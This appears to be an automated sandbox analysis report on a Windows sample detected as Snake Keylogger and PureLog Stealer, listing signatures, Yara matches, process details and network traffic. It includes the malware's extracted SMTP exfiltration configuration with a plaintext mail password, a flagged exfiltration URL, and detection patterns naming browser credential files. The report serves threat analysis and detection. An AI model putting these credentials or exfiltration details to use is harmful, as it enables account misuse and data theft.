Edit tour

Windows Analysis Report
DNXS-04-22.exe

Overview

General Information

Sample name:	DNXS-04-22.exe
Analysis ID:	1435145
MD5:	64932c473d74fbdfdb706a094543cf37
SHA1:	f19b8960681b56cab45a9f14871108cf4d522251
SHA256:	8b9dedaa09d239667dd9cabe0c7efab61712868b32ebb3a50110df8980823ce9
Tags:	exe
Infos:

Detection

PureLog Stealer, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected PureLog Stealer

Yara detected Snake Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

DNXS-04-22.exe (PID: 5288 cmdline: "C:\Users\user\Desktop\DNXS-04-22.exe" MD5: 64932C473D74FBDFDB706A094543CF37)

DNXS-04-22.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\DNXS-04-22.exe" MD5: 64932C473D74FBDFDB706A094543CF37)

DNXS-04-22.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\DNXS-04-22.exe" MD5: 64932C473D74FBDFDB706A094543CF37)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@eraslangroup.net", "Password": "aHZAyjDK", "Host": "mail.eraslangroup.net", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1366480871.0000000007570000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1359852790.0000000003357000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14880:$a1: get_encryptedPassword 0x14b76:$a2: get_encryptedUsername 0x1468c:$a3: get_timePasswordChanged 0x14787:$a4: get_passwordField 0x14896:$a5: set_encryptedPassword 0x15e63:$a7: get_logins 0x15dc6:$a10: KeyLoggerEventArgs 0x15a5f:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18184:$x1: $%SMTPDV$ 0x181e8:$x2: $#TheHashHere%& 0x1983b:$x3: %FTPDV$ 0x1992f:$x4: $%TelegramDv$ 0x15a5f:$x5: KeyLoggerEventArgs 0x15dc6:$x5: KeyLoggerEventArgs 0x1985f:$m2: Clipboard Logs ID 0x19a2b:$m2: Screenshot Logs ID 0x19af7:$m2: keystroke Logs ID 0x19a03:$m4: \SnakeKeylogger\
00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x807f0:$a1: get_encryptedPassword 0xa1210:$a1: get_encryptedPassword 0xc1a30:$a1: get_encryptedPassword 0x80ae6:$a2: get_encryptedUsername 0xa1506:$a2: get_encryptedUsername 0xc1d26:$a2: get_encryptedUsername 0x805fc:$a3: get_timePasswordChanged 0xa101c:$a3: get_timePasswordChanged 0xc183c:$a3: get_timePasswordChanged 0x806f7:$a4: get_passwordField 0xa1117:$a4: get_passwordField 0xc1937:$a4: get_passwordField 0x80806:$a5: set_encryptedPassword 0xa1226:$a5: set_encryptedPassword 0xc1a46:$a5: set_encryptedPassword 0x81dd3:$a7: get_logins 0xa27f3:$a7: get_logins 0xc3013:$a7: get_logins 0x81d36:$a10: KeyLoggerEventArgs 0xa2756:$a10: KeyLoggerEventArgs 0xc2f76:$a10: KeyLoggerEventArgs
00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x840f4:$x1: $%SMTPDV$ 0xa4b14:$x1: $%SMTPDV$ 0xc5334:$x1: $%SMTPDV$ 0x84158:$x2: $#TheHashHere%& 0xa4b78:$x2: $#TheHashHere%& 0xc5398:$x2: $#TheHashHere%& 0x857ab:$x3: %FTPDV$ 0xa61cb:$x3: %FTPDV$ 0xc69eb:$x3: %FTPDV$ 0x8589f:$x4: $%TelegramDv$ 0xa62bf:$x4: $%TelegramDv$ 0xc6adf:$x4: $%TelegramDv$ 0x819cf:$x5: KeyLoggerEventArgs 0x81d36:$x5: KeyLoggerEventArgs 0xa23ef:$x5: KeyLoggerEventArgs 0xa2756:$x5: KeyLoggerEventArgs 0xc2c0f:$x5: KeyLoggerEventArgs 0xc2f76:$x5: KeyLoggerEventArgs 0x857cf:$m2: Clipboard Logs ID 0x8599b:$m2: Screenshot Logs ID 0x85a67:$m2: keystroke Logs ID
Process Memory Space: DNXS-04-22.exe PID: 5288	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: DNXS-04-22.exe PID: 5288	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: DNXS-04-22.exe PID: 5288	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5deb9:$a1: get_encryptedPassword 0x5e1a5:$a2: get_encryptedUsername 0x5dccf:$a3: get_timePasswordChanged 0x5ddca:$a4: get_passwordField 0x5decf:$a5: set_encryptedPassword 0x6011b:$a7: get_logins 0x6007e:$a10: KeyLoggerEventArgs 0x5fd17:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: DNXS-04-22.exe PID: 5288	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x5fd17:$x5: KeyLoggerEventArgs 0x6007e:$x5: KeyLoggerEventArgs 0x60b5c:$x5: KeyLoggerEventArgs 0x60e90:$x5: KeyLoggerEventArgs 0x6249d:$m2: Clipboard Logs ID 0x6257d:$m2: Screenshot Logs ID 0x625b1:$m2: keystroke Logs ID 0x62569:$m4: \SnakeKeylogger\
Process Memory Space: DNXS-04-22.exe PID: 7264	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: DNXS-04-22.exe PID: 7264	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: DNXS-04-22.exe PID: 7264	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1e73b:$a1: get_encryptedPassword 0x1ea27:$a2: get_encryptedUsername 0x1e551:$a3: get_timePasswordChanged 0x1e64c:$a4: get_passwordField 0x1e751:$a5: set_encryptedPassword 0x2099d:$a7: get_logins 0x20900:$a10: KeyLoggerEventArgs 0x20599:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: DNXS-04-22.exe PID: 7264	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x20599:$x5: KeyLoggerEventArgs 0x20900:$x5: KeyLoggerEventArgs 0x213de:$x5: KeyLoggerEventArgs 0x21712:$x5: KeyLoggerEventArgs 0x22d1f:$m2: Clipboard Logs ID 0x22dff:$m2: Screenshot Logs ID 0x22e33:$m2: keystroke Logs ID 0x22deb:$m4: \SnakeKeylogger\
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.DNXS-04-22.exe.7570000.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DNXS-04-22.exe.7570000.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DNXS-04-22.exe.337a064.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DNXS-04-22.exe.337b07c.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DNXS-04-22.exe.3359434.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DNXS-04-22.exe.40a9d70.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.DNXS-04-22.exe.40a9d70.7.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.DNXS-04-22.exe.40a9d70.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c80:$a1: get_encryptedPassword 0x12f76:$a2: get_encryptedUsername 0x12a8c:$a3: get_timePasswordChanged 0x12b87:$a4: get_passwordField 0x12c96:$a5: set_encryptedPassword 0x14263:$a7: get_logins 0x141c6:$a10: KeyLoggerEventArgs 0x13e5f:$a11: KeyLoggerEventArgsEventHandler
0.2.DNXS-04-22.exe.40a9d70.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a53f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19771:$a3: \Google\Chrome\User Data\Default\Login Data 0x19ba4:$a4: \Orbitum\User Data\Default\Login Data 0x1abe3:$a5: \Kometa\User Data\Default\Login Data
0.2.DNXS-04-22.exe.40a9d70.7.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1381a:$s1: UnHook 0x13821:$s2: SetHook 0x13829:$s3: CallNextHook 0x13836:$s4: _hook
0.2.DNXS-04-22.exe.40a9d70.7.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16584:$x1: $%SMTPDV$ 0x165e8:$x2: $#TheHashHere%& 0x17c3b:$x3: %FTPDV$ 0x17d2f:$x4: $%TelegramDv$ 0x13e5f:$x5: KeyLoggerEventArgs 0x141c6:$x5: KeyLoggerEventArgs 0x17c5f:$m2: Clipboard Logs ID 0x17e2b:$m2: Screenshot Logs ID 0x17ef7:$m2: keystroke Logs ID 0x17e03:$m4: \SnakeKeylogger\
4.2.DNXS-04-22.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.DNXS-04-22.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.DNXS-04-22.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.DNXS-04-22.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a80:$a1: get_encryptedPassword 0x14d76:$a2: get_encryptedUsername 0x1488c:$a3: get_timePasswordChanged 0x14987:$a4: get_passwordField 0x14a96:$a5: set_encryptedPassword 0x16063:$a7: get_logins 0x15fc6:$a10: KeyLoggerEventArgs 0x15c5f:$a11: KeyLoggerEventArgsEventHandler
4.2.DNXS-04-22.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c33f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b571:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b9a4:$a4: \Orbitum\User Data\Default\Login Data 0x1c9e3:$a5: \Kometa\User Data\Default\Login Data
4.2.DNXS-04-22.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1561a:$s1: UnHook 0x15621:$s2: SetHook 0x15629:$s3: CallNextHook 0x15636:$s4: _hook
4.2.DNXS-04-22.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18384:$x1: $%SMTPDV$ 0x183e8:$x2: $#TheHashHere%& 0x19a3b:$x3: %FTPDV$ 0x19b2f:$x4: $%TelegramDv$ 0x15c5f:$x5: KeyLoggerEventArgs 0x15fc6:$x5: KeyLoggerEventArgs 0x19a5f:$m2: Clipboard Logs ID 0x19c2b:$m2: Screenshot Logs ID 0x19cf7:$m2: keystroke Logs ID 0x19c03:$m4: \SnakeKeylogger\
0.2.DNXS-04-22.exe.40ca790.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.DNXS-04-22.exe.40ca790.8.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.DNXS-04-22.exe.40ca790.8.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c80:$a1: get_encryptedPassword 0x12f76:$a2: get_encryptedUsername 0x12a8c:$a3: get_timePasswordChanged 0x12b87:$a4: get_passwordField 0x12c96:$a5: set_encryptedPassword 0x14263:$a7: get_logins 0x141c6:$a10: KeyLoggerEventArgs 0x13e5f:$a11: KeyLoggerEventArgsEventHandler
0.2.DNXS-04-22.exe.40ca790.8.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a53f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19771:$a3: \Google\Chrome\User Data\Default\Login Data 0x19ba4:$a4: \Orbitum\User Data\Default\Login Data 0x1abe3:$a5: \Kometa\User Data\Default\Login Data
0.2.DNXS-04-22.exe.40ca790.8.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1381a:$s1: UnHook 0x13821:$s2: SetHook 0x13829:$s3: CallNextHook 0x13836:$s4: _hook
0.2.DNXS-04-22.exe.40ca790.8.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16584:$x1: $%SMTPDV$ 0x165e8:$x2: $#TheHashHere%& 0x17c3b:$x3: %FTPDV$ 0x17d2f:$x4: $%TelegramDv$ 0x13e5f:$x5: KeyLoggerEventArgs 0x141c6:$x5: KeyLoggerEventArgs 0x17c5f:$m2: Clipboard Logs ID 0x17e2b:$m2: Screenshot Logs ID 0x17ef7:$m2: keystroke Logs ID 0x17e03:$m4: \SnakeKeylogger\
0.2.DNXS-04-22.exe.40ca790.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.DNXS-04-22.exe.40ca790.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.DNXS-04-22.exe.40ca790.8.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.DNXS-04-22.exe.40ca790.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a80:$a1: get_encryptedPassword 0x352a0:$a1: get_encryptedPassword 0x14d76:$a2: get_encryptedUsername 0x35596:$a2: get_encryptedUsername 0x1488c:$a3: get_timePasswordChanged 0x350ac:$a3: get_timePasswordChanged 0x14987:$a4: get_passwordField 0x351a7:$a4: get_passwordField 0x14a96:$a5: set_encryptedPassword 0x352b6:$a5: set_encryptedPassword 0x16063:$a7: get_logins 0x36883:$a7: get_logins 0x15fc6:$a10: KeyLoggerEventArgs 0x367e6:$a10: KeyLoggerEventArgs 0x15c5f:$a11: KeyLoggerEventArgsEventHandler 0x3647f:$a11: KeyLoggerEventArgsEventHandler
0.2.DNXS-04-22.exe.40ca790.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1561a:$s1: UnHook 0x35e3a:$s1: UnHook 0x15621:$s2: SetHook 0x35e41:$s2: SetHook 0x15629:$s3: CallNextHook 0x35e49:$s3: CallNextHook 0x15636:$s4: _hook 0x35e56:$s4: _hook
0.2.DNXS-04-22.exe.40ca790.8.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18384:$x1: $%SMTPDV$ 0x38ba4:$x1: $%SMTPDV$ 0x183e8:$x2: $#TheHashHere%& 0x38c08:$x2: $#TheHashHere%& 0x19a3b:$x3: %FTPDV$ 0x3a25b:$x3: %FTPDV$ 0x19b2f:$x4: $%TelegramDv$ 0x3a34f:$x4: $%TelegramDv$ 0x15c5f:$x5: KeyLoggerEventArgs 0x15fc6:$x5: KeyLoggerEventArgs 0x3647f:$x5: KeyLoggerEventArgs 0x367e6:$x5: KeyLoggerEventArgs 0x19a5f:$m2: Clipboard Logs ID 0x19c2b:$m2: Screenshot Logs ID 0x19cf7:$m2: keystroke Logs ID 0x3a27f:$m2: Clipboard Logs ID 0x3a44b:$m2: Screenshot Logs ID 0x3a517:$m2: keystroke Logs ID 0x19c03:$m4: \SnakeKeylogger\ 0x3a423:$m4: \SnakeKeylogger\
0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a80:$a1: get_encryptedPassword 0x354a0:$a1: get_encryptedPassword 0x55cc0:$a1: get_encryptedPassword 0x14d76:$a2: get_encryptedUsername 0x35796:$a2: get_encryptedUsername 0x55fb6:$a2: get_encryptedUsername 0x1488c:$a3: get_timePasswordChanged 0x352ac:$a3: get_timePasswordChanged 0x55acc:$a3: get_timePasswordChanged 0x14987:$a4: get_passwordField 0x353a7:$a4: get_passwordField 0x55bc7:$a4: get_passwordField 0x14a96:$a5: set_encryptedPassword 0x354b6:$a5: set_encryptedPassword 0x55cd6:$a5: set_encryptedPassword 0x16063:$a7: get_logins 0x36a83:$a7: get_logins 0x572a3:$a7: get_logins 0x15fc6:$a10: KeyLoggerEventArgs 0x369e6:$a10: KeyLoggerEventArgs 0x57206:$a10: KeyLoggerEventArgs
0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1561a:$s1: UnHook 0x3603a:$s1: UnHook 0x5685a:$s1: UnHook 0x15621:$s2: SetHook 0x36041:$s2: SetHook 0x56861:$s2: SetHook 0x15629:$s3: CallNextHook 0x36049:$s3: CallNextHook 0x56869:$s3: CallNextHook 0x15636:$s4: _hook 0x36056:$s4: _hook 0x56876:$s4: _hook
0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18384:$x1: $%SMTPDV$ 0x38da4:$x1: $%SMTPDV$ 0x595c4:$x1: $%SMTPDV$ 0x183e8:$x2: $#TheHashHere%& 0x38e08:$x2: $#TheHashHere%& 0x59628:$x2: $#TheHashHere%& 0x19a3b:$x3: %FTPDV$ 0x3a45b:$x3: %FTPDV$ 0x5ac7b:$x3: %FTPDV$ 0x19b2f:$x4: $%TelegramDv$ 0x3a54f:$x4: $%TelegramDv$ 0x5ad6f:$x4: $%TelegramDv$ 0x15c5f:$x5: KeyLoggerEventArgs 0x15fc6:$x5: KeyLoggerEventArgs 0x3667f:$x5: KeyLoggerEventArgs 0x369e6:$x5: KeyLoggerEventArgs 0x56e9f:$x5: KeyLoggerEventArgs 0x57206:$x5: KeyLoggerEventArgs 0x19a5f:$m2: Clipboard Logs ID 0x19c2b:$m2: Screenshot Logs ID 0x19cf7:$m2: keystroke Logs ID
Click to see the 31 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DNXS-04-22.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://scratchdreams.tk	Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS	Avira URL Cloud: Label: malware
Source: http://scratchdreams.tk	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@eraslangroup.net", "Password": "aHZAyjDK", "Host": "mail.eraslangroup.net", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: scratchdreams.tk	Virustotal: Detection: 17%	Perma Link
Source: https://scratchdreams.tk/_send_.php?TS	Virustotal: Detection: 16%	Perma Link
Source: http://scratchdreams.tk	Virustotal: Detection: 17%	Perma Link
Source: https://scratchdreams.tk	Virustotal: Detection: 18%	Perma Link

Multi AV Scanner detection for submitted file

Source: DNXS-04-22.exe	ReversingLabs: Detection: 65%
Source: DNXS-04-22.exe	Virustotal: Detection: 69%			Perma Link

Machine Learning detection for sample

Source: DNXS-04-22.exe

Joe Sandbox ML: detected

Source: DNXS-04-22.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49711 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.8:49726 version: TLS 1.2

Source: DNXS-04-22.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: JWXz.pdb source: DNXS-04-22.exe
Source:	Binary string: JWXz.pdbSHA256 source: DNXS-04-22.exe

Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D08D95h	4_2_00D08A58
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D00B99h	4_2_00D008F0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D07BA1h	4_2_00D078F8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D00741h	4_2_00D00498
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D0774Ah	4_2_00D074A0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D002E9h	4_2_00D00040
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_00D03808
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D072C9h	4_2_00D07020
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D05891h	4_2_00D055E8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D01449h	4_2_00D011A0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D08451h	4_2_00D081A8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D07FF9h	4_2_00D07D50
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D00FF1h	4_2_00D00D48
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D06169h	4_2_00D05EC0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D05D11h	4_2_00D05A68
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D088A9h	4_2_00D08600
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D06E71h	4_2_00D06BC8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D06A19h	4_2_00D06770
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 00D065C1h	4_2_00D06318
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 028CF7A1h	4_2_028CF4E8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_028CEA08
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 028CFBF9h	4_2_028CF941
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 06772658h	4_2_06772240
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 06770F11h	4_2_06770C60
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 0677021Dh	4_2_06770040
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 06770BA7h	4_2_06770040
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 06772091h	4_2_06771DE0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 0677D511h	4_2_0677D268
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 0677D0B9h	4_2_0677CE10
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 0677D969h	4_2_0677D6C0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 0677E219h	4_2_0677DF70
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 0677DDC1h	4_2_0677DB18
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 0677E671h	4_2_0677E3C8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 0677EF21h	4_2_0677EC78
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 0677EAC9h	4_2_0677E820
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 0677F379h	4_2_0677F0D0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 06771371h	4_2_067710C0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 0677C809h	4_2_0677C560
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 067717D1h	4_2_06771520
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 0677F7D1h	4_2_0677F528
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 0677C3B1h	4_2_0677C108
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 0677CC61h	4_2_0677C9B8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 06772658h	4_2_06772586
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 06771C31h	4_2_06771980
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4x nop then jmp 0677FC29h	4_2_0677F980

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
